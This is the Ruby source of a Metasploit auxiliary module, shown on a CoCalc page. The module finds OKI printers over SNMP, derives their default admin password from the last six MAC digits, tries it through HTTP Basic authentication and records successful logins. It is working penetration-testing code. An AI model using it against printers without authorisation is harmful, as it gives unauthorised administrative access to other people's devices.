CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/misc/oki_scanner.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
# TODO: Split this module into two separate SNMP and HTTP modules.

7


8
class MetasploitModule < Msf::Auxiliary

9
  include Msf::Exploit::Remote::SNMPClient

10
  include Msf::Auxiliary::Scanner

11
  include Msf::Auxiliary::Report

12


13
  def initialize(info={})

14
    super(update_info(info,

15
      'Name'          => 'OKI Printer Default Login Credential Scanner',

16
      'Description'   => %q{

17
        This module scans for OKI printers via SNMP, then tries to connect to found devices

18
        with vendor default administrator credentials via HTTP authentication. By default, OKI

19
        network printers use the last six digits of the MAC as admin password.

20
      },

21
      'Author'        => 'antr6X <anthr6x[at]gmail.com>',

22
      'License'       => MSF_LICENSE

23
    ))

24


25
    register_options(

26
      [

27
        OptPort.new('SNMPPORT', [true, 'The SNMP Port', 161]),

28
        OptPort.new('HTTPPORT', [true, 'The HTTP Port', 80])

29
      ])

30


31
    deregister_options('RPORT', 'VHOST')

32
  end

33


34
  def cleanup

35
    datastore['RPORT'] = @org_rport

36
  end

37


38
  def report_cred(opts)

39
    service_data = {

40
      address: opts[:ip],

41
      port: opts[:port],

42
      service_name: opts[:service_name],

43
      protocol: 'tcp',

44
      workspace_id: myworkspace_id

45
    }

46


47
    credential_data = {

48
      origin_type: :service,

49
      module_fullname: fullname,

50
      username: opts[:user],

51
      private_data: opts[:password],

52
      private_type: :password

53
    }.merge(service_data)

54


55
    login_data = {

56
      last_attempted_at: Time.now,

57
      core: create_credential(credential_data),

58
      status: Metasploit::Model::Login::Status::SUCCESSFUL,

59
      proof: opts[:proof]

60
    }.merge(service_data)

61


62
    create_credential_login(login_data)

63
  end

64


65
  def run_host(ip)

66
    @org_rport = datastore['RPORT']

67
    datastore['RPORT'] = datastore['SNMPPORT']

68


69
    index_page = "index_ad.htm"

70
    auth_req_page = "status_toc_ad.htm"

71
    snmp = connect_snmp()

72


73
    snmp.walk("1.3.6.1.2.1.2.2.1.6") do |mac|

74
      last_six  = mac.value.unpack("H2H2H2H2H2H2").join[-6,6].upcase

75
      first_six = mac.value.unpack("H2H2H2H2H2H2").join[0,6].upcase

76


77
      # check if it is a OKI

78
      # OUI list can be found at http://standards.ieee.org/develop/regauth/oui/oui.txt

79
      if first_six ==  "002536" || first_six == "008087" || first_six == "002536"

80
        sys_name = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s

81
        print_status("Found: #{sys_name}")

82
        print_status("Trying credential: admin/#{last_six}")

83


84
        tcp = Rex::Socket::Tcp.create(

85
          'PeerHost' => rhost,

86
          'PeerPort' => datastore['HTTPPORT'],

87
          'Context' =>

88
            {

89
              'Msf'=>framework,

90
              'MsfExploit'=>self

91
            }

92
        )

93


94
        auth = Rex::Text.encode_base64("admin:#{last_six}")

95


96
        http_data = "GET /#{auth_req_page} HTTP/1.1\r\n"

97
        http_data << "Referer: http://#{ip}/#{index_page}\r\n"

98
        http_data << "Authorization: Basic #{auth}\r\n\r\n"

99


100
        tcp.put(http_data)

101
        data = tcp.recv(12)

102


103
        response = "#{data[9..11]}"

104


105
        case response

106
        when "200"

107
          print_good("#{rhost}:#{datastore['HTTPPORT']} logged in as: admin/#{last_six}")

108
          report_cred(

109
            ip: rhost,

110
            port: datastore['HTTPPORT'],

111
            service_name: 'http',

112
            user: 'admin',

113
            password: last_six,

114
            proof: response.inspect

115
          )

116
        when "401"

117
          print_error("Default credentials failed")

118
        when "404"

119
          print_status("Page not found, try credential manually: admin/#{last_six}")

120
        else

121
          print_status("Unexpected message")

122
        end

123


124
        disconnect()

125
      end

126
    end

127


128
    # No need to make noise about timeouts

129
    rescue ::Rex::ConnectionError, ::SNMP::RequestTimeout, ::SNMP::UnsupportedVersion

130
    rescue ::Interrupt

131
      raise $!

132
    rescue ::Exception => e

133
      print_error("#{ip} Error: #{e.class} #{e} #{e.backtrace}")

134
    ensure

135
      disconnect_snmp

136
    end

137
end

138


139